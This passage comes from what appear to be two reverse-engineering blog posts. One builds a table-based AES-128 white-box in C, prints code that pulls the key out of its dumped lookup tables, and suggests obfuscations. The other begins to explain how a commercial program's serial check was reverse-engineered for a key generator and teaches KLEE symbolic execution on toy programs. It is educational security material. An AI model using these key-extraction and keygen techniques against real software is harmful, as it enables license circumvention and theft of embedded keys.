out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];

by this (where Ty[0-4] are the look-up tables I mentioned just above):

DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];

We know that gmul[X] gives you 1 byte, and we can see those four lines use gmul[X][a] where X is constant. You can also see that basically those four lines take 4 bytes as input a, b, c & d and will generate 4 bytes as output.

The idea is to combine gmul[matrix[0]][a], gmul[matrix[4]][a], gmul[matrix[8]][a] & gmul[matrix[12]][a] inside a single double-word. We do the same for b, c & d so that we can directly apply the xor operation between double-words now ; the result will also be a double-word so we have our 4 output bytes. We just re-factorized 4 individual computations (1 byte as input, 1 byte as output) into a single one (4 bytes as input, 4 bytes as output).

With that in mind, the tables generation function writes nearly by itself:

int main()
{
[...]
    typedef union
    {
        unsigned char b[4];
        unsigned int i;
    } magic_int;

    /// 4 -> four rows MC
    /// 0x100 -> for every char
    unsigned int Ty[4][0x100] = { 0 };
    printf("const unsigned int Ty[4][16][0x100] =\n{\n");
    for (size_t i = 0; i < 4; ++i)
    {
        printf("  {\n    ");
        for (size_t j = 0; j < 0x100; ++j)
        {
            if (j != 0 && (j % 16) == 0)
                printf("\n    ");

            magic_int mi;

            mi.b[0] = gmul[matrix[i + 0]][j];
            mi.b[1] = gmul[matrix[i + 4]][j];
            mi.b[2] = gmul[matrix[i + 8]][j];
            mi.b[3] = gmul[matrix[i + 12]][j];

            Ty[i][j] = mi.i;

            printf("0x%.8x", Ty[i][j]);
            if ((j + 1) < 0x100)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 4)
            printf(",");
        printf("\n");
    }
    printf("};\n");
}

Glad to replace that MixColumn call now:

void aes128_enc_wb_step2(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

You can even make it cleaner by merging the two inner-loops & make them both handle 4 bytes of data by 4 bytes of data:

// Unified the loops by treating the state 4 bytes by 4 bytes
void aes128_enc_wb_step3(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 6: Adding a little xor table

This step is a really simple one (& kind of useless) ; we just want to transform the xor operation between 2 double-words by a look-up table that does that between 2 nibbles (4 bits). Basically, you combine 8 nibbles to get a full double-word with or operations & some binary shifts. Easy peasy:

int main()
{
[...]
    /// Xor Tables
    /// Basically takes two nibbles in input & generate a nibble in output (x^y)
    unsigned char Xor[0x10][0x10] = { 0 };
    printf("const unsigned char Xor[0x10][0x10] =\n{\n");
    for (size_t i = 0; i < 0x10; ++i)
    {
        printf("  {\n    ");

        for (size_t j = 0; j < 0x10; ++j)
        {
            if (j != 0 && (j % 8) == 0)
                printf("\n    ");

            Xor[i][j] = i ^ j;
            printf("0x%.1x", Xor[i][j]);
            if ((j + 1) < 0x10)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 0x10)
            printf(",");
        printf("\n");
    }
    printf("};\n");
    return EXIT_SUCCESS;
}

Which is directly used by our implementation:

void aes128_enc_wb_step4(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            unsigned int aa = Ty[0][a];
            unsigned int bb = Ty[1][b];
            unsigned int cc = Ty[2][c];
            unsigned int dd = Ty[3][d];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]])  | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]])  | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]])  | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]])  | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 7: Combining TBoxes & Ty tables

The last step aims to combine the Tboxes with Ty tables and if you look at the code it doesn't seem really hard. We basically want the table to work this way: 1 byte as input (a for example in the previous code) & generate 4 bytes of outputs.

To compute such a table, you need to compute the Tboxes (or not, you can compute everything without relying on the Tboxes ; it's actually what I'm doing), & then you compute Ty[Y][Tboxes[i][j][X]] ; this is it, roughly. X, i and j are the unknown variables here, which means we will end-up with a table like that:

const unsigned int Tyboxes[9][16][0x100];

Makes sense right?

So here is the code that generates that big table:

int main()
{
[...]
    /// Tyboxes
    /// It's basically Tybox(Tboxes(x))
    unsigned int Tyboxes[9][16][0x100] = { 0 };
    printf("const unsigned int Tyboxes[9][16][0x100] =\n{\n");
    for (size_t r = 0; r < 9; ++r)
    {
        printf("  {\n");

        // ShiftRows(round_keys[r]); <- don't forget we already executed that to compute the Tboxes

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                unsigned char c = S_box[x ^ round_keys[r][i]];
                Tyboxes[r][i][x] = Ty[i % 4][c];

                printf("0x%.8x", Tyboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }

            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 10)
            printf(",");
        printf("\n");
    }
    printf("};\n");

    printf("const unsigned char Tboxes_[16][0x100] = \n{\n");
    for (size_t i = 0; i < 16; ++i)
    {
        printf("  {\n    ");
        for (size_t x = 0; x < 0x100; ++x)
        {
            if (x != 0 && (x % 16) == 0)
                printf("\n    ");

            Tboxes[9][i][x] = S_box[x ^ round_keys[9][i]] ^ round_keys[10][i];
            printf("0x%.2x", Tboxes[9][i][x]);
            if ((x + 1) < 0x100)
                printf(", ");
        }
        printf("\n  }");
        if ((i + 1) < 16)
            printf(",");

        printf("\n");
    }

    printf("};\n\n");
    return EXIT_SUCCESS;
}

We just have to take care of the last round which is a bit different as we saw earlier, but no biggie.

Final code

Yeah, finally, here we are ; the final code of our (not protected) AES128 white-box:

void aes128_enc_wb_final(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned int aa = Tyboxes[i][j * 4 + 0][out[j * 4 + 0]];
            unsigned int bb = Tyboxes[i][j * 4 + 1][out[j * 4 + 1]];
            unsigned int cc = Tyboxes[i][j * 4 + 2][out[j * 4 + 2]];
            unsigned int dd = Tyboxes[i][j * 4 + 3][out[j * 4 + 3]];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]]) | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]]) | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]]) | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]]) | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes_[j][out[j]];
        out[j] = x;
    }
}

It's cute isn't it?

Attacking the white-box: extract the key

As the title says, this white-box implementation is really insecure: which means that if you have access to an executable with that kind of white-box you just have to extract Tyboxes[0] & do a little magic to extract the key.

If it's not already obvious to you, you just have to remember how we actually compute the values inside that big tables ; look carefully at those two lines:

unsigned char c = S_box[x ^ round_keys[r][i]];
Tyboxes[r][i][x] = Ty[i % 4][c];

In our case, r is 0, i will be the byte index of the round key 0 (which is the AES key) & we can also set x to a constant value: let's say 0 or 1 for instance. S_box is known, Ty too as this transformation is always the same (it doesn't depend on the key). Basically we just need to brute-force round_keys[r][i] with every values a byte can take. If the computed value is equal to the one in the dumped Tyboxes, then we have extracted one byte of the round key & we can go find the next one.

Attentive readers noticed that we are not going to actually extract the encryption key per-se, but ShiftRows(key) instead (remember that we needed to apply this transformation to build our white-box). But again, ShiftRows being not key-dependent we can invert this operation easily to really have the plain encryption key this time.

Here is the code that does what I just described:

unsigned char scrambled_key[16] = { 0 };
for (size_t i = 0; i < 16; ++i)
{
    // unsigned char c = S_box[0 ^ X0];
    // Tyboxes[0][0][0] = Ty[0][c];
    unsigned int value = Tyboxes_round0_dumped[i][1];
    // Now we generate the 0x100 possible values for the character 0 & wait to find a match
    for (size_t j = 0; j < 0x100; ++j)
    {
        unsigned char c = S_box[1 ^ j];
        unsigned int computed_value = Ty[i % 4][c];
        if (computed_value == value)
            scrambled_key[i] = j;
    }
}

{
    unsigned char tmp1, tmp2;
    // 8-bits right rotation of the second line
    tmp1 = scrambled_key[13];
    scrambled_key[13] = scrambled_key[9];
    scrambled_key[9] = scrambled_key[5];
    scrambled_key[1] = tmp1;

    // 16-bits right rotation of the third line
    tmp1 = scrambled_key[10];
    tmp2 = scrambled_key[14];
    scrambled_key[14] = scrambled_key[6];
    scrambled_key[10] = scrambled_key[2];
    scrambled_key[6] = tmp2;
    scrambled_key[2] = tmp1;

    // 24-bits right rotation of the last line
    tmp1 = scrambled_key[15];
    scrambled_key[15] = scrambled_key[3];
    scrambled_key[3] = scrambled_key[7];
    scrambled_key[7] = scrambled_key[11];
    scrambled_key[11] = tmp1;
}

printf("Key successfully extracted & UnShiftRow'd:\n");
for (size_t i = 0; i < 16; ++i)
    printf("\\x%.2x", scrambled_key[i]);

Obfuscating it?

This is basically the part where you have no limits, where you can exercise your creativity & develop stuff. I'll just talk about ideas & obvious things, a lot of them are directly taken from @elvanderb's challenge so I guess I owe him yet another beer.

The first things you can do for free are:

  • Unrolling the implementation to make room for craziness
  • Use public LLVM passes on the unrolled implementation to make it even more crazy

The other good idea is to try to make less obvious key elements in your implementation: basically the AES state, the tables & their structures. Those three things give away quite some important information about how your implementation works, so making a bit harder to figure those points out is good for us. Instead of storing the AES state inside a contiguous memory area of 16 bytes, why not use 16 non-contiguous variables of 1 byte? You can go even further by using different variables for every round to make it even more confusing.

You can also apply that same idea to the different arrays our implementation uses: do not store them in a contiguous memory area, dispatch them all over the memory & transform them in one dimension arrays instead.

We could also imagine a generic array "obfuscation" where you add several "layers" before reaching the value you are interested in:

  • Imagine an array [1,5,10,11] ; we could shuffle this one into [10, 5, 1, 11] and build the associated index table which would be [2, 1, 0, 3]
  • And now instead of accessing directly the first array, you retrieve the correct index first in the index table, shuffled[index[0]]
    • Obviously you could have as many indirections you want

To make everything always more confusing, we could build the primitives we need on top of crazy CPU extensions like SSE or MMX; or completely build a virtual software-processor..!

Do also try to shuffle everything that is "shufflable" ; here is simple graph that shows data-dependencies between the lines of our unrolled C implementation (an arrow from A to B means that A needs to be executed prior to B):

aes.svg
From here, you have everything you need to move the lines around & generate a "less normal" implementation (even that we can clearly see what I call synchronization points at the end of every round which is basically the calls to ShiftRows(out) ; but again we could get rid of those, and directly in-lining them etc):
def generate_shuffled_implementation_via_dependency_graph(dependency_graph, out_filename):
    '''This function is basically leveraging the graph we produced in the previous function
    to generate an actual shuffled implementation of the AES white-box without breaking any
    constraints, keeping the result of this new shuffled function the same as the clean version.'''
    lines = open('aes_unrolled_code.raw.clean.unique_aabbccdd', 'r').readlines()
    print ' > Finding the bottom of the graph..'
    last_nodes = set()
    for i in range(len(lines)):
        _, degree_o = dependency_graph.degree_iter(i, indeg = False, outdeg = True).next()
        if degree_o == 0:
            last_nodes.add(dependency_graph.get_node(i))

    assert(len(last_nodes) != 0)
    print ' > Good, check it out: %r' % last_nodes
    shuffled_lines = []
    step_n = 0
    print ' > Lets go'
    while len(last_nodes) != 0:
        print '  %.2d> Shuffle %d nodes / lines..' % (step_n, len(last_nodes))
        random.shuffle(list(last_nodes), random = random.random)
        shuffled_lines.extend(lines[int(i.get_name())] for i in last_nodes)
        step_n += 1

        print '  %.2d> Finding parents / stepping back ..' % step_n
        tmp = set()
        for node in last_nodes:
            tmp.update(dependency_graph.in_neighbors(node))
        last_nodes = tmp
        step_n += 1

    shuffled_lines = reversed(shuffled_lines)
    with open(out_filename, 'w') as f:
        f.write('''void aes128_enc_wb_final_unrolled_shuffled_%d(unsigned char in[16], unsigned char out[16])
{
memcpy(out, in, 16);
''' % random.randint(0, 0xffffffff))
        f.writelines(shuffled_lines)
        f.write('}')
    return shuffled_lines

Anyway, I wish I had time to implement what we just talked about but I unfortunately don't; if you do feel free to shoot me an email & I'll update the post with links to your code :-).

Last words

I hope this little post gave you enough to understand how white-box cryptography kind of works, how important is the design of the implementation and what sort of problems you can encounter. If you enjoyed this subject, here is a list of cool articles you may want to check out:

Every source file produced for this post has been posted on my github account right here: wbaes128.

Special thanks to my mate @__x86 for proof-reading!

Keygenning with KLEE

Introduction

In the past weeks I enjoyed working on reversing a piece of software (don't ask me the name), to study how serial numbers are validated. The story the user has to follow is pretty common: download the trial, pay, get the serial number, use it in the annoying nag screen to get the fully functional version of the software.

Since my purpose is to not damage the company developing the software, I will not mention the name of the software, nor I will publish the final key generator in binary form, nor its source code. My goal is instead to study a real case of serial number validation, and to highlight its weaknesses.

In this post we are going to take a look at the steps I followed to reverse the serial validation process and to make a key generator using KLEE symbolic virtual machine. We are not going to follow all the details on the reversing part, since you cannot reproduce them on your own. We will concentrate our thoughts on the key-generator itself: that is the most interesting part.

Getting acquainted

The software is an x86 executable, with no anti-debugging, nor anti-reversing techniques. When started it presents a nag screen asking for a registration composed by: customer number, serial number and a mail address. This is fairly common in software.

Tools of the trade

First steps in the reversing are devoted to find all the interesting functions to analyze. To do this I used IDA Pro with Hex-Rays decompiler, and the WinDbg debugger. For the last part I used KLEE symbolic virtual machine under Linux, gcc compiler and some bash scripting. The actual key generator was a simple WPF application.

Let me skip the first part, since it is not very interesting. You can find many other articles on the web that can guide you through basic reversing techniques with IDA Pro. I only kept in mind some simple rules, while going forward:

  • always rename functions that uses interesting data, even if you don't know precisely what they do. A name like license_validation_unknown_8 is always better than a default like sub_46fa39;
  • similarly, rename data whenever you find it interesting;
  • change data types when you are sure they are wrong: use structs and arrays in case of aggregates;
  • follow cross references of data and functions to expand your collection;
  • validate your beliefs with the debugger if possible. For example, if you think a variable contains the serial, break with the debugger and see if it is the case.

Big picture

When I collected the most interesting functions, I tried to understand the high level flow and the simpler functions. Here are the main variables and types used in the validation process. As a note for the reader: most of them have been purged of uninteresting details, for the sake of simplicity.

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

Here we have a global variable providing the type of the license, used to enable and disable features of the application.

enum result_t {
    INVALID,
    VALID,
    VALID_IF_LAST_VERSION
};

This is a convenient enum used as a result for the validation. INVALID and VALID values are pretty self-explanatory. VALID_IF_LAST_VERSION tells that this registration is valid only if the current software version is the last available. The reasons for this strange possibility will be clear shortly.

#define HEADER_SIZE 8192
struct {
    int header[HEADER_SIZE];
    int data[1000000];
} mail_digest_table;

This is a data structure, containing digests of mail addresses of known registered users. This is a pretty big file embedded in the executable itself. During startup, a resource is extracted in a temporary file and its content copied into this struct. Each element of the header vector is an offset pointing inside the data vector.

Here we have a pseudo-C code for the registration check, that uses data types and variables explained above:

enum result_t check_registration(int serial, int customer_num, const char* mail) {
    // validate serial number
    license_type = get_license_type(serial);
    if (license_type == ERROR)
        return INVALID;

    // validate customer number
    int expected_customer = compute_customer_number(serial, mail);
    if (expected_customer != customer_num)
        return INVALID;

    // validate w.r.t. known registrations
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

The validation is divided in three main parts:

  • serial number must be valid by itself;
  • serial number, combined with mail address has to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

The last point is a little bit unusual. Let me restate it in this way: whenever a customer buys the software, the customer table gets updated with its data and become available in the next version of the software (because it is embedded in the binary and not downloaded trough the internet). This explains the VALID_IF_LAST_VERSION check: if you buy the software today, the current version does not contain your data. You are still allowed to get a "pro" version until a new version is released. In that moment you are forced to update to that new version, so the software can verify your registration with the updated table. Here is a pseudo-code of that check:

switch (check_registration(serial, customer, mail)) {
case VALID:
    // the registration is OK! activate functionalities
    activate_pro_functionality();
    break;
case VALID_IF_LAST_VERSION:
    {
        // check if the current version is the last, by
        // using the internet.
        int current_version = get_current_version();
        int last_version = get_last_version();
        if (current_version == last_version)
            // OK for now: a new version is not available
            activate_pro_functionality();
        else
            // else, force the user to download the new version
            // before proceed
            ask_download();
    }
    break;
case INVALID:
    // registration is not valid
    handle_invalid_registration();
    break;
}

The version check is done by making an HTTP request to a specific page that returns a page having only the last version number of the software. Don't ask me why the protection is not completely server side but involves static tables, version checks and things like that. I don't know!

Anyway, this is the big picture of the registration validation functions, and this is pretty boring. Let's move on to the interesting part. You may notice that I provided code for the main procedure, but not for the helper functions like get_license_type, compute_customer_number, and so on. This is because I did not have to reverse them. They contain a lot of arithmetical and logical operations on registration data, and they are very difficult to understand. The good news is that we do not have to understand them, we need only to reverse them!

Symbolic execution

Symbolic execution is a way to execute programs using symbolic variables instead of concrete values. A symbolic variable is used whenever a value can be controlled by user input (this can be done by hand or determined by using taint analysis), and could be a file, standard input, a network stream, etc. Symbolic execution translates the program's semantics into a logical formula. Each instruction cause that formula to be updated. By solving a formula for one path, we get concrete values for the variables. If those values are used in the program, the execution reaches that program point. Dynamic Symbolic Execution (DSE) builds the logical formula at runtime, step-by-step, following one path at a time. When a branch of the program is found during the execution, the engine transforms the condition into arithmetic operations. It then chooses the T (true) or F (false) branch and updates the formula with this new constraint (or its negation). At the end of a path, the engine can backtrack and select another path to execute. For example:

int v1 = SymVar_1, v2 = SymVar_2; // symbolic variables
if (v1 > 0)
    v2 = 0;
if (v2 == 0 && v1 <= 0)
    error();

We want to check if error is reachable, by using symbolic variables SymVar_1 and SymVar_2, assigned to the program's variables v1 and v2. In line 2 we have the condition v1 > 0 and so, the symbolic engine adds a constraint SymVar_1 > 0 for the true branch or conversely SymVar_1 <= 0 for the false branch. It then continues the execution trying with the first constraint. Whenever a new path condition is reached, new constraints are added to the symbolic state, until that condition is no more satisfiable. In that case, the engine backtracks and replaces some constraints with their negation, in order to reach other code paths. The execution engine tries to cover all code paths, by solving those constraints and their negations. For each portion of the code reached, the symbolic engine outputs a test case covering that part of the program, providing concrete values for the input variables. In the particular example given, the engine continues the execution, and finds the condition v2 == 0 && v1 <= 0 at line 4. The path formula becomes so: SymVar_1 > 0 && (SymVar_2 == 0 && SymVar_1 <= 0), that is not satisfiable. The symbolic engine provides then values for the variables that satisfies the previous formula (SymVar_1 > 0). For example SymVar_1 = 1 and some random value for SymVar_2. The engine then backtrack to the previous branch and uses the negation of the constraint, that is SymVar_1 <= 0. It then adds the negation of the current constraint to cover the false branch, obtaining SymVar_1 <= 0 && (SymVar_2 != 0 || SymVar_1 > 0). This is satisfiable with SymVar_1 = -1 and SymVar_2 = 0. This concludes the analysis of the program paths, and our symbolic execution engine can output the following test cases:

  • v1 = 1;
  • v1 = -1, v2 = 0.

Those test cases are enough to cover all the paths of the program.

This approach is useful for testing because it helps generating test cases. It is often effective, and it does not waste computational power of your brain. You know... tests are very difficult to do effectively, and brain power is such a scarce resource!

I don't want to elaborate too much on this topic because it is way too big to fit in this post. Moreover, we are not going to use symbolic execution engines for testing purpose. This is just because we don't like to use things in the way they are intended :)

However, I will point you to some good references in the last section. Here I can list a series of common strengths and weaknesses of symbolic execution, just to give you a little bit of background:

Strengths:

  • when a test case fails, the program is proven to be incorrect;
  • automatic test cases catch errors that often are overlooked in manual written test cases (this is from KLEE paper);
  • when it works it's cool :) (and this is from Jérémy);

Weaknesses:

  • when no tests fail we are not sure everything is correct, because no proof of correctness is given; static analysis can do that when it works (and often it does not!);
  • covering all the paths is not enough, because a variable can hold different values in one path and only some of them cause a bug;
  • complete coverage for non trivial programs is often impossible, due to path explosion or constraint solver timeout;
  • scaling is difficult, and execution time of the engine can suffer;
  • undefined behavior of CPU could lead to unexpected results;
  • ... and maybe there are a lot more remarks to add.

KLEE

KLEE is a great example of a symbolic execution engine. It operates on LLVM byte code, and it is used for software verification purposes. KLEE is capable to automatically generate test cases achieving high code coverage. KLEE is also able to find memory errors such as out of bound array accesses and many other common errors. To do that, it needs an LLVM byte code version of the program, symbolic variables and (optionally) assertions. I have also prepared a Docker image with clang and klee already configured and ready to use. So, you have no excuses to not try it out! Take this example function:

#define FALSE 0
#define TRUE 1
typedef int BOOL;

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    return FALSE; // not reachable
}

This is actually a silly example, I know, but let's pretend to verify this function with this main:

#include <assert.h>
#include <klee/klee.h>

int main() {
    int input;
    klee_make_symbolic(&input, sizeof(int), "input");
    return check_arg(input);
}

In main we have a symbolic variable used as input for the function to be tested. We can also modify it to include an assertion:

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    klee_assert(FALSE);
    return FALSE; // not reachable
}

We can now use clang to compile the program to the LLVM byte code and run the test generation with the klee command:

clang -emit-llvm -g -o test.ll -c test.c
klee test.ll

We get this output:

KLEE: output directory is "/work/klee-out-0"

KLEE: done: total instructions = 26
KLEE: done: completed paths = 2
KLEE: done: generated tests = 2

KLEE will generate test cases for the input variable, trying to cover all the possible execution paths and to make the provided assertions to fail (if any given). In this case we have two execution paths and two generated test cases, covering them. Test cases are in the output directory (in this case /work/klee-out-0). The soft link klee-last is also provided for convenience, pointing to the last output directory. Inside that directory a bunch of files were created, including the two test cases named test000001.ktest and test000002.ktest. These are binary files, which can be examined with the ktest-tool utility. Let's try it:

$ ktest-tool --write-ints klee-last/test000001.ktest 
ktest file : 'klee-last/test000001.ktest'
args       : ['test.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: 2147483647

And the second one:

$ ktest-tool --write-ints klee-last/test000002.ktest 
...
object    0: data: 0

In these test files, KLEE reports the command line arguments, the symbolic objects along with their size and the value provided for the test. To cover the whole program, we need input variable to get a value greater than 10 and one below or equal. You can see that this is the case: in the first test case the value 2147483647 is used, covering the first branch, while 0 is provided for the second, covering the other branch.

So far, so good. But what if we change the function in this way?

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a < 10)    // instead of <=
        return TRUE;
    klee_assert(FALSE);
    return FALSE;       // now reachable
}

We get this output:

$ klee test.ll 
KLEE: output directory is "/work/klee-out-2"
KLEE: ERROR: /work/test.c:9: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 27
KLEE: done: completed paths = 3
KLEE: done: generated tests = 3

And this is the klee-last directory contents:

$ ls klee-last/
assembly.ll   run.istats        test000002.assert.err  test000003.ktest
info          run.stats         test000002.ktest       warnings.txt
messages.txt  test000001.ktest  test000002.pc

Note the test000002.assert.err file. If we examine its corresponding test file, we have:

$ ktest-tool --write-ints klee-last/test000002.ktest 
ktest file : 'klee-last/test000002.ktest'
...
object    0: data: 10

As we had expected, the assertion fails when input value is 10. So, as we now have three execution paths, we also have three test cases, and the whole program gets covered. KLEE provides also the possibility to replay the tests with the real program, but we are not interested in it now. You can see a usage example in this KLEE tutorial.

KLEE's abilities to find execution paths of an application are very good. According to the OSDI 2008 paper, KLEE has been successfully used to test all 89 stand-alone programs in GNU COREUTILS and the equivalent busybox port, finding previously undiscovered bugs, errors and inconsistencies. The achieved code coverage were more than 90% per tool. Pretty awesome!

But, you may ask: The question is, who cares?. You will see it in a moment.

KLEE to reverse a function

As we have a powerful tool to find execution paths, we can use it to find the path we are interested in. As showed by the nice symbolic maze post of Feliam, we can use KLEE to solve a maze. The idea is simple but very powerful: flag the portion of code you interested in with a klee_assert(0) call, causing KLEE to highlight the test case able to reach that point. In the maze example, this is as simple as changing a read call with a klee_make_symbolic and the prinft("You win!\n") with the already mentioned klee_assert(0). Test cases triggering this assertion are the one solving the maze!

For a concrete example, let's suppose we have this function:

int magic_computation(int input) {
    for (int i = 0; i < 32; ++i)
        input ^= 1 << i;
    return input;
}

And we want to know for what input we get the output 253. A main that tests this could be:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    int output = magic_computation(input);
    if (output == 253)
        printf("You win!\n");
    else
        printf("You lose\n");
    return 0;
}

KLEE can resolve this problem for us, if we provide symbolic inputs and actually an assert to trigger:

int main(int argc, char* argv[]) {
    int input, result;
    klee_make_symbolic(&input, sizeof(int), "input");
    result = magic_computation(input);
    if (result == 253)
        klee_assert(0);
    return 0;
}

Run KLEE and print the result:

$ clang -emit-llvm -g -o magic.ll -c magic.c
$ klee magic.ll
$ ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args       : ['magic.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: -254

The answer is -254. Let's test it:

$ gcc magic.c
$ ./a.out -254
You win!

Yes!

KLEE, libc and command line arguments

Not all the functions are so simple. At least we could have calls to the C standard library such as strlen, atoi, and such. We cannot link our test code with the system available C library, as it is not inspectable by KLEE. For example:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    return input;
}

If we run it with KLEE we get this error:

$ clang -emit-llvm -g -o atoi.ll -c atoi.c
$ klee atoi.ll 
KLEE: output directory is "/work/klee-out-4"
KLEE: WARNING: undefined reference to function: atoi
KLEE: WARNING ONCE: calling external: atoi(0)
KLEE: ERROR: /work/atoi.c:5: failed external call: atoi
